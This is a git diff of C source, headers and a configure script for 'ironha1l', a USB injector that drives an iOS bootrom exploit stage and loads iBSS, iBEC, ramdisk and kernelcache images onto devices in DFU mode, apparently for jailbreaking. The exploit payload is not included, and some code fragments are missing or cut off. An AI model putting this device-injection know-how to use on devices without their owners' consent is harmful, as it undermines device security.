--------------- Updated: Oct-10-2012 -------------------- **// +//** ********************************************************* **// +//** **// +//** Author: Pascal CLEMENT aka Thireus **// +//** **// +//** http://ironha1l.thireus.com **// +//** http://blog.thireus.com **// +//** **// +//** ironha1l Tool Suite, **// +//** Copyright © 2012 Thireus. **// +//***************************************************************// +//**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**// +//***************************************************************// + +#include +#include +#include +#include +#include + +#include "ironha1l.h" + +int main(int argc, char *argv[]) +{ + + setbuf(stdout, NULL); // No stdout buffer + + char option; + int errflg = 0; + int inc_opt = 0; + int quit = 0; + + // Files + const char + *limera1n_file = NULL, + *ibss_file = NULL, + *ibec_file = NULL, + *devicetree_file = NULL, + *ramdisk_file = NULL, + *kernelcache_file = NULL; + // tmpFile + const char + *tmp_fileName = NULL; + + //idUSB + unsigned idBus = 0; + + // Injection data + char * data; + unsigned dataLen; // used to store data lengths + + // Device + libusb_context * device = NULL; + + // Debug + DEBUG = 0x0; // default debug mode (does not print anything from ironha1l) + LIBUSBDEBUG = 0x0; // default libusb debug mode (does not print anything from libusb) + + // Command + STAILQ_HEAD(, CommandList) cmd_head; + STAILQ_INIT(&cmd_head); + CommandList * command; + + while ((option = getopt(argc, argv, "hv:d:l:i:b:t:r:k:c:z:")) != EOF && quit != 1){ + switch (option) { + case 'h': + errflg++; + debug(L0, "\n"); // Same as usage debug level + quit = 1; + break; + case 'v': + DEBUG = (char) atoi(optarg); + // Hello guys :D + if(DEBUG == L0 || DEBUG == L1 || DEBUG == L2 || DEBUG == L3){ + debug(L1, "Welcome on ironha1l!\n\n"); + debug(L1, "[X] VERBOSE level selected: %i\n", DEBUG); + } + else + { + errflg++; + debug(L0, "[X] VERBOSE level must be 0-3\n", DEBUG); + quit = 1; + } + break; + case 'd': + LIBUSBDEBUG = (char) atoi(optarg); + // Hello guys :D + if(LIBUSBDEBUG == L0 || LIBUSBDEBUG == L1 || LIBUSBDEBUG == L2 || LIBUSBDEBUG == L3){ + debug(L1, "[X] LIBUSBDEBUG level selected: %i\n", LIBUSBDEBUG); + } + else + { + errflg++; + debug(L0, "[X] LIBUSBDEBUG level must be 0-3\n", LIBUSBDEBUG); + quit = 1; + } + break; + case 'l': + tmp_fileName = "-l limera1n_file"; + if (file_alreadyloaded(limera1n_file)){ + file_exists(optarg, tmp_fileName); + limera1n_file = optarg; + optionrequired(&inc_opt); + file_loaded(tmp_fileName); + } + break; + case 'i': + tmp_fileName = "-i iBSS_file"; + if (file_alreadyloaded(ibss_file)){ + file_exists(optarg, tmp_fileName); + ibss_file = optarg; + optionrequired(&inc_opt); + file_loaded(tmp_fileName); + } + break; + case 'b': + tmp_fileName = "-b iBEC_file"; + if (file_alreadyloaded(ibec_file)){ + file_exists(optarg, tmp_fileName); + ibec_file = optarg; + optionrequired(&inc_opt); + file_loaded(tmp_fileName); + } + break; + case 't': + tmp_fileName = "-t DeviceTree_file"; + if (file_alreadyloaded(devicetree_file)){ + file_exists(optarg, tmp_fileName); + devicetree_file = optarg; + optionrequired(&inc_opt); + file_loaded(tmp_fileName); + } + break; + case 'r': + tmp_fileName = "-r Ramdisk_file"; + if (file_alreadyloaded(ramdisk_file)){ + file_exists(optarg, tmp_fileName); + ramdisk_file = optarg; + optionrequired(&inc_opt); + file_loaded(tmp_fileName); + } + break; + case 'k': + tmp_fileName = "-k KernelCache_file"; + if (file_alreadyloaded(kernelcache_file)){ + file_exists(optarg, tmp_fileName); + kernelcache_file = optarg; + optionrequired(&inc_opt); + file_loaded(tmp_fileName); + } + break; + case 'c': + command = malloc(sizeof(*command)); + command->str = malloc(sizeof(char) * strlen(optarg)+1); + strcpy(command->str, optarg); + STAILQ_INSERT_TAIL(&cmd_head, command, cmd_next); + optionrequired(&inc_opt); + debug(L1, "[X] -c iBSS_command: %s\n", optarg); + break; + case 'z': + idBus = atoi(optarg); + debug(L1, "[X] -z idBus: %d\n", idBus); + break; + case '?': + errflg++; + quit = 1; + break; + default: + quit = 1; + break; + } + } + + // Exit and usage if wrong number of options or if bad option + if (errflg || inc_opt == 0){ + usage(argv[0]); + } + if(DEBUG != L0 && DEBUG != L1 && DEBUG != L2 && DEBUG != L3) + DEBUG = L0; + if(LIBUSBDEBUG != L0 && LIBUSBDEBUG != L1 && LIBUSBDEBUG != L2 && LIBUSBDEBUG != L3) + LIBUSBDEBUG = L0; + + // limera1n exploit + debug(L1, "\n[*] ---- STAGE 1 ----\n"); + + // **** BEGIN limera1n **** // +if (!file_alreadyloaded(limera1n_file)){ + debug(L1, "[X] START! limera1n injection...\n"); + select0r(&device); + + swait(5); + + limera1n_inject0r(getCPID(idAPPLE, idDFU, idBus, device), idBus, device, limera1n_file); + + injectFinishReset(idAPPLE, idDFU, idBus, device); + swait(1); + + destruct0r(device); +} +else{ + debug(L2, "[SKIP] limera1n_file missing!\n"); +} + // **** END limera1n **** // + + debug(L1, "\n[*] ---- STAGE 2 ----\n"); + + // **** BEGIN iBSS **** // +if (!file_alreadyloaded(ibss_file)){ + debug(L1, "[X] START! iBSS injection...\n"); + select0r(&device); + + data = (char *) ibss_file; + dataLen = 0x800; + inject0r(CTRL_FILE_IN_OUT, idAPPLE, idDFU, idBus, device, (unsigned char *) data, (const unsigned) dataLen, 0x21, 0x1, 0x0, 0x0, 1000); + + injectFinishReset(idAPPLE, idDFU, idBus, device); + swait(5); + + destruct0r(device); +} +else{ + debug(L2, "[SKIP] ibss_file missing!\n"); +} + // **** END iBSS **** // + + // **** BEGIN iBEC **** // +if (!file_alreadyloaded(ibec_file)){ + debug(L1, "[X] START! iBEC injection...\n"); + select0r(&device); + + data = (char *) ibec_file; + dataLen = 0x800; + inject0r(CTRL_FILE_IN_OUT, idAPPLE, idDFU, idBus, device, (unsigned char *) data, (const unsigned) dataLen, 0x21, 0x1, 0x0, 0x0, 1000); + + injectFinishReset(idAPPLE, idDFU, idBus, device); + swait(5); + + destruct0r(device); +} +else{ + debug(L2, "[SKIP] ibec_file missing!\n"); +} + // **** END iBEC **** // + + debug(L1, "\n[*] ---- STAGE 3 ----\n"); + + // **** BEGIN COMMAND **** // +if (!STAILQ_EMPTY(&cmd_head)){ + debug(L1, "[X] START! Command injection...\n"); + + STAILQ_FOREACH(command, &cmd_head, cmd_next) { + select0r(&device); + + debug(L1, "[X] INJECTING iBSS_command... %s\n", command->str); + + data = command->str; + dataLen = strlen(data)+1; + inject0r(CTRL_OUT, idAPPLE, idRecovery_2, idBus, device, (unsigned char *) data, (const unsigned) dataLen, 0x40, 0x0, 0x0, 0x0, 1000); // idVendor, idProduct, data, headers + + destruct0r(device); + } + + while (!STAILQ_EMPTY(&cmd_head)) + { + command = STAILQ_FIRST(&cmd_head); + STAILQ_REMOVE_HEAD(&cmd_head, cmd_next); + free(command->str); + free(command); + } + +} +else{ + debug(L2, "[SKIP] iBSS_command missing!\n"); +} + // **** END COMMAND **** // + + // **** BEGIN RAMDISK **** // +if (!file_alreadyloaded(ramdisk_file)){ + debug(L1, "[X] START! RAMDISK injection...\n"); + select0r(&device); + + data = ""; + dataLen = 0x0; + inject0r(CTRL_OUT, idAPPLE, idRecovery_2, idBus, device, (unsigned char *) data, (const unsigned) dataLen, 0x41, 0x0, 0x0, 0x0, 1000); // REQUIRED TO INJECT... WHY??? + + data = (char *) ramdisk_file; + dataLen = 0x4000; + inject0r(BULK_FILE, idAPPLE, idRecovery_2, idBus, device, (unsigned char *) data, (const unsigned) dataLen, 0x21, 0x0, 0x0, 0x0, 0); // FUCKINGBIT A 0 OBLIGATOIRE = Interface 0 + + data = "ramdisk"; + dataLen = 0x7+1; + inject0r(CTRL_OUT, idAPPLE, idRecovery_2, idBus, device, (unsigned char *) data, (const unsigned) dataLen, 0x40, 0x1, 0x0, 0x0, 1000); // idVendor, idProduct, data, headers + swait(5); + + destruct0r(device); +} +else{ + debug(L2, "[SKIP] ramdisk_file missing!\n"); +} + // **** END RAMDISK **** // + + // **** BEGIN DEVICETREE **** // +if (!file_alreadyloaded(devicetree_file)){ + debug(L1, "[X] START! DEVICETREE injection...\n"); + select0r(&device); + + data = ""; + dataLen = 0x0; + inject0r(CTRL_OUT, idAPPLE, idRecovery_2, idBus, device, (unsigned char *) data, (const unsigned) dataLen, 0x41, 0x0, 0x0, 0x0, 1000); // REQUIRED TO INJECT... WHY??? + + data = (char *) devicetree_file; // To be replaced by limera1n exploit + dataLen = 0x800; + inject0r(BULK_FILE, idAPPLE, idRecovery_2, idBus, device, (unsigned char *) data, (const unsigned) dataLen, 0x21, 0x1, 0x0, 0x0, 0); + + data = "devicetree"; + dataLen = 0xA+1; + inject0r(CTRL_OUT, idAPPLE, idRecovery_2, idBus, device, (unsigned char *) data, (const unsigned) dataLen, 0x40, 0x1, 0x0, 0x0, 1000); // idVendor, idProduct, data, headers + swait(5); + + destruct0r(device); +} +else{ + debug(L2, "[SKIP] devicetree_file missing!\n"); +} + // **** END DEVICETREE **** // + + // **** BEGIN KERNELCACHE **** // +if (!file_alreadyloaded(kernelcache_file)){ + debug(L1, "[X] START! KERNELCACHE injection...\n"); + select0r(&device); + + data = ""; + dataLen = 0x0; + inject0r(CTRL_OUT, idAPPLE, idRecovery_2, idBus, device, (unsigned char *) data, (const unsigned) dataLen, 0x41, 0x0, 0x0, 0x0, 1000); // REQUIRED TO INJECT... WHY??? + + data = (char *) kernelcache_file; + dataLen = 0x8000; + inject0r(BULK_FILE, idAPPLE, idRecovery_2, idBus, device, (unsigned char *) data, (const unsigned) dataLen, 0x21, 0x1, 0x0, 0x0, 0); + + data = "bootx"; + dataLen = 0x5+1; + inject0r(CTRL_OUT, idAPPLE, idRecovery_2, idBus, device, (unsigned char *) data, (const unsigned) dataLen, 0x40, 0x1, 0x0, 0x0, 1000); // idVendor, idProduct, data, headers + + destruct0r(device); +} +else{ + debug(L2, "[SKIP] kernelcache_file missing!\n"); +} + // **** END KERNELCACHE **** // + + debug(L1, "\n[*] ---- STAGE 4 ----\n"); + + debug(L1, "[X] Ho Yeah! :D\n\n"); + + return 0; +} + +static void file_loaded(const char * fileName){ + debug(L1, "[X] %s LOADED!\n", fileName); +} +static void file_failed(const char * fileName){ + debug(L1, "[-] %s FAILED TO LOAD!\n", fileName); +} +static int file_alreadyloaded(const char * filePathName){ + if (filePathName) + return 0; + return 1; +} + +static void file_exists (const char * filePathName, const char * fileName){ + struct stat buf; + if (stat(filePathName, &buf)){ + file_failed(fileName); + debug(L1, "[-] FAILED! Sorry, %s cannot be found!\n", fileName); + exit(1); + } +} + +static void optionrequired(int * inc_opt){ + (*inc_opt)++; +} + +static void usage(char *progname){ + debug(L0, "usage: %s -h (help)\n\t[-v verbose_level{0,1,2,3}] [-d libusb_debug_level{0,1,2,3}]\n\t[-l limera1n_file] [-i iBSS_file] [-b iBEC_file]\n\t[-t DeviceTree_file] [-r Ramdisk_file] [-k KernelCache_file]\n\t[-c iBSS_command]\n\t[-z idBus]\n", progname); + exit(1); +} diff --git a/applications/ironha1l.h b/applications/ironha1l.h new file mode 100644 index 0000000..c7a699b --- /dev/null +++ b/applications/ironha1l.h @@ -0,0 +1,35 @@ +//***************************************************************// +//** This file is part of ironha1l Tool Suite. **// +//** ironha1l, a DFU injector tool for iDevices. **// +//** **// +//** ********************************************************* **// +//** --------------- Updated: Oct-10-2012 -------------------- **// +//** ********************************************************* **// +//** **// +//** Author: Pascal CLEMENT aka Thireus **// +//** **// +//** http://ironha1l.thireus.com **// +//** http://blog.thireus.com **// +//** **// +//** ironha1l Tool Suite, **// +//** Copyright © 2012 Thireus. **// +//***************************************************************// +//**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**// +//***************************************************************// + +#ifndef IRONHA1L_H_ +#define IRONHA1L_H_ + +#include + +#include "../libironha1l/libironha1l.h" +#include "../limera1n/limera1n.h" + +static void usage(char *progname); +static void optionrequired(int * inc_opt); +static void file_exists (const char * filePathName, const char * fileName); +static void file_loaded(const char * fileName); +static int file_alreadyloaded(const char * filePathName); +typedef struct CommandList { char *str; STAILQ_ENTRY(CommandList) cmd_next; } CommandList; + +#endif /*IRONHA1L_H_*/ diff --git a/common/common.c b/common/common.c new file mode 100644 index 0000000..7315f05 --- /dev/null +++ b/common/common.c @@ -0,0 +1,37 @@ +//***************************************************************// +//** This file is part of ironha1l Tool Suite. **// +//** ironha1l, a DFU injector tool for iDevices. **// +//** **// +//** ********************************************************* **// +//** --------------- Updated: Oct-10-2012 -------------------- **// +//** ********************************************************* **// +//** **// +//** Author: Pascal CLEMENT aka Thireus **// +//** **// +//** http://ironha1l.thireus.com **// +//** http://blog.thireus.com **// +//** **// +//** ironha1l Tool Suite, **// +//** Copyright © 2012 Thireus. **// +//***************************************************************// +//**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**// +//***************************************************************// + +#include +#include +#include + +#include "common.h" + +void debug(char level, char * text, ...){ + va_list ap; + + va_start(ap, text); /* Initialize the va_list */ + if (DEBUG >= level) + vprintf(text, ap); +} + +void swait(unsigned int time){ + debug(L2, "[...] Waiting %d seconds...\n", time); + sleep(time); +} diff --git a/common/common.h b/common/common.h new file mode 100644 index 0000000..b75dc34 --- /dev/null +++ b/common/common.h @@ -0,0 +1,54 @@ +//***************************************************************// +//** This file is part of ironha1l Tool Suite. **// +//** ironha1l, a DFU injector tool for iDevices. **// +//** **// +//** ********************************************************* **// +//** --------------- Updated: Oct-10-2012 -------------------- **// +//** ********************************************************* **// +//** **// +//** Author: Pascal CLEMENT aka Thireus **// +//** **// +//** http://ironha1l.thireus.com **// +//** http://blog.thireus.com **// +//** **// +//** ironha1l Tool Suite, **// +//** Copyright © 2012 Thireus. **// +//***************************************************************// +//**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**// +//***************************************************************// + +#ifndef COMMON_H_ +#define COMMON_H_ + +// inject0r +#define CTRL_OUT 0x1 +#define CTRL_IN 0x2 +#define CTRL_IN_OUT 0x3 +#define BULK 0x4 +#define CTRL_FILE_OUT 0x5 +#define CTRL_FILE_IN_OUT 0x6 +#define BULK_FILE 0x7 +#define RESET 0x8 +// 0xXX -> [A,B,x,x,x,x,x,x] where A define whether if we have device or dev_handle as pointer and B if close dev_handle or not (cf inject0r) + +// debug +char DEBUG; // global debug var +char LIBUSBDEBUG; //global libusb debug var +#define L0 0x0 +#define L1 0x1 +#define L2 0x2 +#define L3 0x3 + +// idVendor, idProduct +#define idAPPLE 0x05ac +#define idDFU 0x1227 // http://theiphonewiki.com/wiki/index.php?title=DFU_Mode http://theiphonewiki.com/wiki/index.php?title=WTF + +#define idRecovery_1 0x1280 +#define idRecovery_2 0x1281 +#define idRecovery_3 0x1282 +#define idRecovery_4 0x1283 + +void debug(char level, char * text, ...); +void swait(unsigned int time); + +#endif /*COMMON_H_*/ diff --git a/configure b/configure new file mode 100755 index 0000000..8312539 --- /dev/null +++ b/configure @@ -0,0 +1,179 @@ +#***************************************************************# +#** This file is part of ironha1l Tool Suite. **# +#** ironha1l, a DFU injector tool for iDevices. **# +#** **# +#** ********************************************************* **# +#** --------------- Updated: Oct-10-2012 -------------------- **# +#** ********************************************************* **# +#** **# +#** Author: Pascal CLEMENT aka Thireus **# +#** **# +#** http://ironha1l.thireus.com **# +#** http://blog.thireus.com **# +#** **# +#** ironha1l Tool Suite, **# +#** Copyright © 2012 Thireus. **# +#***************************************************************# +#**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**# +#***************************************************************# + +#!/bin/sh + +libusb="libusb-1.0.9" #libusb version to download +usbmuxd="usbmuxd-1.0.8" #usbmuxd version to download + +if [[ $1 == "android" || $1 == "ANDROID" ]]; then + platform="ANDROID" +else + platform=$(uname) +fi + +createmakefile=1 +dir=$(dirname $0) +cur_dir=$(pwd) + +echo "Welcome on ironha1l configuration script." +echo "" + +if [[ "$platform" == "Linux" ]]; then + echo "[X] Linux platform detected!" + FLAGS="LDFLAGSLIBUSB = # Linux" +elif [[ "$platform" == "Darwin" ]]; then + echo "[X] Darwin platform detected!" + FLAGS="LDFLAGSLIBUSB = # MacOS" +elif [[ "$platform" == "OpenBSD" ]]; then + echo "[X] OpenBSD platform detected!" + FLAGS="LDFLAGSLIBUSB = -pthread # OpenBSD" +elif [[ "$platform" == "ANDROID" ]]; then + echo "[X] ANDROID platform detected!" +else + echo "[-] Sorry but your platform is not supported." + createmakefile=0 +fi + +if [[ $createmakefile == 0 ]]; then + exit +fi + +if [[ "$platform" != "ANDROID" ]]; then + echo "[X] Creating Makefile" + echo "$FLAGS" > $dir/Makefile + echo "BASEDIR = $dir" >> $dir/Makefile + echo "" >> $dir/Makefile + echo "include $dir/Makefile.default" >> $dir/Makefile +else + echo "[X] You should read ANDROID/README file!" +fi + +######## libusb START ######## +echo "" +echo "[X] Checking libusb..." + +echo "" +if ! [ -d $dir/tmp ]; then + echo "[X] Creating tmp directory..." + mkdir $dir/tmp +fi + +echo "" +if [ -f $dir/tmp/$libusb.tar.bz2 ]; then + echo "[X] $libusb.tar.bz2 FOUND! Skipping download." +else + echo "[X] Downloading libusb." + wget -O $dir/tmp/$libusb.tar.bz2 --tries=3 http://sourceforge.net/projects/libusb/files/libusb-1.0/$libusb/$libusb.tar.bz2/download +fi + +echo "" +echo "[X] Extracting $libusb.tar.bz2" +cd $dir/tmp/ +tar jvxf $libusb.tar.bz2 + +cd $cur_dir +rm -rf $dir/libusb_ironha1l +mv $dir/tmp/$libusb $dir/libusb_ironha1l + +cd $cur_dir +echo "" +if [[ "$platform" == "ANDROID" ]]; then + echo "[X] Creating Android.mk files for libusb." + cp -f $dir/ANDROID/Android.__ROOT_LIBUSB_IRONHA1L__.mk $dir/libusb_ironha1l/Android.mk + cp -f $dir/ANDROID/Android.libusb.mk $dir/libusb_ironha1l/libusb/Android.mk + echo "" + echo "[X] Patching libusb." + cd $cur_dir + patch $dir/libusb_ironha1l/libusb/io.c < $dir/ANDROID/libusb-1.0.3+.libusb.io.c.patch + patch $dir/libusb_ironha1l/libusb/core.c < $dir/ANDROID/libusb-1.0.9+.libusb.core.c.patch + echo "" + echo "[X] Configuring libusb." + cd $dir/libusb_ironha1l + ./configure --enable-static --host=arm-linux --disable-timerfd +else + echo "[X] Configuring libusb." + cd $dir/libusb_ironha1l + ./configure --enable-static +fi + +cd $cur_dir +######## libusb END ######## + +######## usbmuxd START ######## +echo "" +echo "[X] Checking usbmuxd..." + +echo "" +if ! [ -d $dir/tmp ]; then + echo "[X] Creating tmp directory..." + mkdir $dir/tmp +fi + +echo "" +if [ -f $dir/tmp/$usbmuxd.tar.gz ]; then + echo "[X] $usbmuxd.tar.gz FOUND! Skipping download." +else + echo "[X] Downloading usbmuxd." + wget -O $dir/tmp/$usbmuxd.tar.gz --tries=3 http://cgit.sukimashita.com/usbmuxd.git/snapshot/$usbmuxd.tar.gz +fi + +echo "" +echo "[X] Extracting $usbmuxd.tar.gz" +cd $dir/tmp/ +tar zvxf $usbmuxd.tar.gz + +cd $cur_dir +rm -rf $dir/usbmuxd_ironha1l +mv $dir/tmp/$usbmuxd $dir/usbmuxd_ironha1l + +cd $cur_dir +echo "" +if [[ "$platform" == "ANDROID" ]]; then + echo "[X] Creating Android.mk file for usbmuxd." + cp -f $dir/ANDROID/Android.__ROOT_USBMUXD_IRONHA1L__.mk $dir/usbmuxd_ironha1l/Android.mk + echo "" + echo "[X] Patching usbmuxd." + cd $cur_dir + patch $dir/usbmuxd_ironha1l/libusbmuxd/usbmuxd-proto.h < $dir/ANDROID/usbmuxd-1.0.8+.libusbmuxd.usbmuxd-proto.h.patch + patch $dir/usbmuxd_ironha1l/libusbmuxd/libusbmuxd.c < $dir/ANDROID/usbmuxd-1.0.8+.libusbmuxd.libusbmuxd.c.patch + patch $dir/usbmuxd_ironha1l/daemon/usb-linux.c < $dir/GENERIC/usbmuxd-1.0.8.daemon.usb-linux.c.patch + patch $dir/usbmuxd_ironha1l/daemon/client.h < $dir/ANDROID/usbmuxd-1.0.8+.daemon.client.h.patch + patch $dir/usbmuxd_ironha1l/daemon/device.c < $dir/ANDROID/usbmuxd-1.0.8+.daemon.device.c.patch + patch $dir/usbmuxd_ironha1l/daemon/main.c < $dir/ANDROID/usbmuxd-1.0.8+.daemon.main.c.patch +else + echo "" + echo "[X] Patching usbmuxd." + cd $cur_dir + patch $dir/usbmuxd_ironha1l/Modules/FindUSB.cmake < $dir/GENERIC/usbmuxd-1.0.8.Modules.FindUSB.cmake.patch + patch $dir/usbmuxd_ironha1l/daemon/usb-linux.c < $dir/GENERIC/usbmuxd-1.0.8.daemon.usb-linux.c.patch + echo "" + echo "[X] Creating usbmuxd build directory." + mkdir $dir/usbmuxd_ironha1l/build +fi + +cd $cur_dir +######## usbmuxd END ######## + +echo "" +if [[ "$platform" == "ANDROID" ]]; then + echo "[X] DONE! You can now run 'make ironha1l devices usbmuxd iproxy' directly from your WORKING_DIRECTORY." +else + echo "[X] DONE! You can now run 'make'." +fi diff --git a/libironha1l/Android.mk b/libironha1l/Android.mk new file mode 100644 index 0000000..f2df447 --- /dev/null +++ b/libironha1l/Android.mk @@ -0,0 +1,33 @@ +#***************************************************************# +#** This file is part of ironha1l Tool Suite. **# +#** ironha1l, a DFU injector tool for iDevices. **# +#** **# +#** ********************************************************* **# +#** --------------- Updated: Oct-10-2012 -------------------- **# +#** ********************************************************* **# +#** **# +#** Author: Pascal CLEMENT aka Thireus **# +#** **# +#** http://ironha1l.thireus.com **# +#** http://blog.thireus.com **# +#** **# +#** ironha1l Tool Suite, **# +#** Copyright © 2012 Thireus. **# +#***************************************************************# +#**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**# +#***************************************************************# + +LOCAL_PATH:= $(call my-dir) +include $(CLEAR_VARS) + +LOCAL_SRC_FILES:= \ + ../common/common.c \ + libironha1l.c + +LOCAL_SHARED_LIBRARIES := libc +LOCAL_STATIC_LIBRARIES := libusb_ironha1l + +LOCAL_MODULE_TAGS := optional +LOCAL_MODULE:= libironha1l + +include $(BUILD_STATIC_LIBRARY) diff --git a/libironha1l/libironha1l.c b/libironha1l/libironha1l.c new file mode 100644 index 0000000..d93a823 --- /dev/null +++ b/libironha1l/libironha1l.c @@ -0,0 +1,495 @@ +//***************************************************************// +//** This file is part of ironha1l Tool Suite. **// +//** ironha1l, a DFU injector tool for iDevices. **// +//** **// +//** ********************************************************* **// +//** --------------- Updated: Oct-10-2012 -------------------- **// +//** ********************************************************* **// +//** **// +//** Author: Pascal CLEMENT aka Thireus **// +//** **// +//** http://ironha1l.thireus.com **// +//** http://blog.thireus.com **// +//** **// +//** ironha1l Tool Suite, **// +//** Copyright © 2012 Thireus. **// +//***************************************************************// +//**PLEASE REFER TO THE README FILE FOR ADDITIONAL INFORMATION!**// +//***************************************************************// + +#include +#include +#include +#include + +#include "libironha1l.h" + +int select0r(libusb_context ** device){ + + int ret; // Return values + + debug(L3, "[X] Initializing USB session...\n"); + + ret = libusb_init(device); // Initialize a library session + if (ret < 0){ + debug(L1, "[-] FAILED! Unable to init libusb session.\n"); + return -1; + } + + libusb_set_debug(*device, (int)LIBUSBDEBUG); // Verbose level set to 1 + + return 0; + +} + +int destruct0r(libusb_context * device){ + + libusb_exit(device); // Close the session + return 0; + +} + +libusb_device_handle * hoock3r(const unsigned idVendor, const unsigned idProduct, const unsigned idBus, libusb_context * device){ + + int ret; // Return values + libusb_device_handle *dev_handle = NULL; // device handle + + libusb_device ** devs = NULL; // Pointer to pointer of device, used to retrieve a list of devices + ssize_t cnt; // Number of detected devices + + debug(L3, "[X] Waiting for device...\n"); // Device must be here :) but just in case we search for it again + + ret = -1; + while (ret < 0){ + + cnt = libusb_get_device_list(device, &devs); //get the list of devices + + if (cnt < 0){ + debug(L1, "[-] FAILED! Unable to get device list.\n"); + return NULL; + } + ret = find_my_device(devs, cnt, idVendor, idProduct, idBus, L3); + } + + libusb_open(devs[ret], &dev_handle); //dev_handle = libusb_open_device_with_vid_pid(device, idVendor, idProduct); + + libusb_free_device_list(devs, 1); // Free the list, unref the devices in it + + if (dev_handle == NULL){ + debug(L1, "[-] FAILED! Unable to handle device.\n"); + return NULL; + } + else{ + debug(L3, "[X] Device Handled.\n"); + } + + if (libusb_kernel_driver_active(dev_handle, 0) == 1){ + debug(L1, "[-] Kernel Driver is active.\n"); + if(libusb_detach_kernel_driver(dev_handle, 0) == 0) + debug(L1, "[-] Kernel Driver Detached!\n"); + } + + ret = libusb_claim_interface(dev_handle, 0); // Use Device Interface (0 here) + + if (ret < 0){ + debug(L1, "[-] FAILED! Unable to claim interface.\n"); + return NULL; + } + debug(L3, "[X] Interface claimed successfully.\n"); + + return dev_handle; + +} + + +libusb_device_handle * wash3r(libusb_device_handle * dev_handle){ + + int ret; // Return values + + ret = libusb_release_interface(dev_handle, 0); // Release the claimed interface + + if (ret != 0){ + debug(L1, "[-] FAILED! Unable to release interface.\n"); + return NULL; + } + debug(L3, "[X] Interface released.\n"); + + libusb_close(dev_handle); // Close the device we opened + + return dev_handle; + +} + +libusb_device_handle * inject0r(const char injection_mode, const unsigned idVendor, const unsigned idProduct, const unsigned idBus, libusb_context * device, unsigned char * data, const unsigned dataLen, const unsigned USB_HEADERS_bmRequestType, const unsigned USB_HEADERS_bRequest, const unsigned USB_HEADERS_wValue, const unsigned USB_HEADERS_wIndex, const unsigned timeout){ + + int ret=0; // Return values + libusb_device_handle *dev_handle; // device handle + + // Injection here + if(((injection_mode>>7)&0x1) != 0x1) + dev_handle = hoock3r(idVendor, idProduct, idBus, device); + else + dev_handle = (libusb_device_handle *)device; + + switch (injection_mode&0x3F) { + case CTRL_OUT: + debug(L3, "[X] CTRL_OUT injection mode selected.\n"); + ret = injectCtrl(dev_handle, data, dataLen, USB_HEADERS_bmRequestType, USB_HEADERS_bRequest, USB_HEADERS_wValue, USB_HEADERS_wIndex, timeout); + break; + case CTRL_IN: + debug(L3, "[X] CTRL_IN injection mode selected.\n"); + ret = injectCtrl(dev_handle, data, dataLen, USB_HEADERS_bmRequestType, USB_HEADERS_bRequest, USB_HEADERS_wValue, USB_HEADERS_wIndex, timeout); + break; + case BULK: + debug(L3, "[X] BULK injection mode selected.\n"); + ret = injectBulk(dev_handle, data, dataLen, 0x4, timeout); + break; + case CTRL_FILE_OUT: + debug(L3, "[X] CTRL_FILE_OUT injection mode selected.\n"); + ret = injectFile(CTRL_OUT, dev_handle, data, dataLen, USB_HEADERS_bmRequestType, USB_HEADERS_bRequest, USB_HEADERS_wValue, USB_HEADERS_wIndex, timeout); + break; + case CTRL_FILE_IN_OUT: + debug(L3, "[X] CTRL_FILE_IN_OUT injection mode selected.\n"); + ret = injectFile(CTRL_IN_OUT, dev_handle, data, dataLen, USB_HEADERS_bmRequestType, USB_HEADERS_bRequest, USB_HEADERS_wValue, USB_HEADERS_wIndex, timeout); + break; + case BULK_FILE: + debug(L3, "[X] BULK_FILE injection mode selected.\n"); + ret = injectFile(BULK, dev_handle, data, dataLen, USB_HEADERS_bmRequestType, USB_HEADERS_bRequest, USB_HEADERS_wValue, USB_HEADERS_wIndex, timeout); + break; + case RESET: + debug(L1, "[X] RESETTING DEVICE.\n"); + ret = injectReset(dev_handle); + break; + default: + debug(L1, "[-] FAILED! You need to specify a valid injection mode.\n"); + ret = -1; + break; + } + + if (ret<0 && injection_mode != RESET) // RESET causes + debug(L2, "[*] WARNING! Something strange happened during injection.\n"); + else + debug(L3, "[X] SUCCESS! Injection OK.\n"); + + if(((injection_mode>>6)&0x1) == 0x1) // return dev_handle + return dev_handle; + + if(injection_mode != RESET) + wash3r(dev_handle); + + return NULL; + +} + +int listDevices(){ + + int ret; // Return values + int i; + libusb_device ** devs; // Pointer to pointer of device, used to retrieve a list of devices + libusb_context * device = NULL; // libusb session + ssize_t cnt; // Number of detected devices + + debug(L1, "[X] Initializing USB session...\n"); + + ret = libusb_init(&device); // Initialize a library session + if (ret < 0){ + debug(L1, "[-] FAILED! Unable to init libusb session.\n"); + return -1; + } + + libusb_set_debug(device, 1); // Verbose level set to 1 + + debug(L2, "[X] Waiting for devices...\n"); + + ret = -1; + cnt = libusb_get_device_list(device, &devs); //get the list of devices + if (cnt < 0){ + debug(L1, "[-] FAILED! Unable to get device list.\n"); + return -1; + } + else{ + for (i=0; i fileLen) + dataLenToSend = fileLen-dataLenSent; + + data = (char *)malloc(dataLen); + fread(data, dataLen, 1, file); + + switch (injection_mode) { + case CTRL_OUT: + injectCtrl(dev_handle, (unsigned char *) data, (const unsigned) dataLenToSend, USB_HEADERS_bmRequestType, USB_HEADERS_bRequest, USB_HEADERS_wValue, USB_HEADERS_wIndex, timeout); + break; + case CTRL_IN: + injectCtrl(dev_handle, (unsigned char *) data, (const unsigned) dataLenToSend, USB_HEADERS_bmRequestType, USB_HEADERS_bRequest, USB_HEADERS_wValue, USB_HEADERS_wIndex, timeout); + break; + case CTRL_IN_OUT: + injectCtrl(dev_handle, (unsigned char *) data, (const unsigned) dataLenToSend, USB_HEADERS_bmRequestType, USB_HEADERS_bRequest, USB_HEADERS_wValue, USB_HEADERS_wIndex, timeout); + free(data); + debug(L3, "[DEBUG] OUT --> IN\n"); + data = (char *)malloc(0x800); + injectCtrl(dev_handle, (unsigned char *) data, 0x6, 0xA1, 0x3, USB_HEADERS_wValue, USB_HEADERS_wIndex, timeout); // Testing IN // CHECK IF WE CAN DELETE THIS + break; + case BULK: + injectBulk(dev_handle, (unsigned char *) data, (const unsigned) dataLenToSend, 0x4, timeout); + break; + default: + debug(L1, "[-] FAILED! Injection mode is fucked.\n"); + break; + } + + free(data); + + dataLenSent += dataLenToSend; + + } + + fclose(file); + + return 0; +} + +int injectCtrl(libusb_device_handle *dev_handle, unsigned char * data, const unsigned dataLen, const unsigned 